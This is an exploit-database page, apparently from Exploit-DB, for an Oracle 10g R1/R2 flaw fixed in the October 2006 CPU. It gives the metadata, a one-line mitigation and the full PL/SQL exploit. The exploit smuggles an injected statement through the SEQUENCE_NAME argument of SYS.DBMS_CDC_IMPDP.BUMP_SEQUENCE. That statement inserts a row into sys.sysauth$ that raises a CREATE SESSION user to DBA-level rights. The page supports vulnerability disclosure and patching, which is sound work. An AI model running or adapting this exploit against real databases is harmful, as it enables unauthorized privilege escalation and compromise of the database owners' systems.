header-logo
Suggest Exploit
vendor:
Oracle Database
by:
Joxean Koret
7.5
CVSS
HIGH
Oracle10g R1 and R2 prior to CPU Oct 2006 exploit
CWE
Product Name: Oracle Database
Affected Version From: Oracle10g R1
Affected Version To: Oracle10g R2
Patch Exists: NO
Related CWE:
CPE: a:oracle:oracle_database:10g_r1
Metasploit:
Other Scripts:
Platforms Tested:
2007

Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006

This exploit allows an attacker with CREATE SESSION privileges to insert malicious code into the sys.sysauth$ table in Oracle10g R1 and R2 prior to CPU Oct 2006. This can lead to unauthorized access and potential compromise of the system.

Mitigation:

Apply the CPU Oct 2006 patch or upgrade to a later version that includes the fix.
Source

Exploit-DB raw data:

/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret <joxeankoret@yahoo.es>
* Privileges needed:
*
* - CREATE SESSION
*
* Max. Length 97. Very, very cool
*
*/
select *
from user_role_privs
;

DECLARE
SEQUENCE_OWNER VARCHAR2(200);
SEQUENCE_NAME VARCHAR2(200);
v_user_id number;
v_commands VARCHAR2(32767);
NEW_VALUE NUMBER;
BEGIN
SELECT user_id INTO v_user_id
FROM user_users;

v_commands := 'insert into sys.sysauth$ ' ||
' values' ||
'(' || v_user_id || ',4,' ||
'999,null)';

SEQUENCE_OWNER := 'TEST';
SEQUENCE_NAME := ''',lockhandle=>:1);' || v_commands || ';commit;
end;--';
NEW_VALUE := 1;
SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE(
SEQUENCE_OWNER => SEQUENCE_OWNER,
SEQUENCE_NAME => SEQUENCE_NAME,
NEW_VALUE => NEW_VALUE
);
END;
/

select *
from user_role_privs
;

// milw0rm.com [2007-01-23]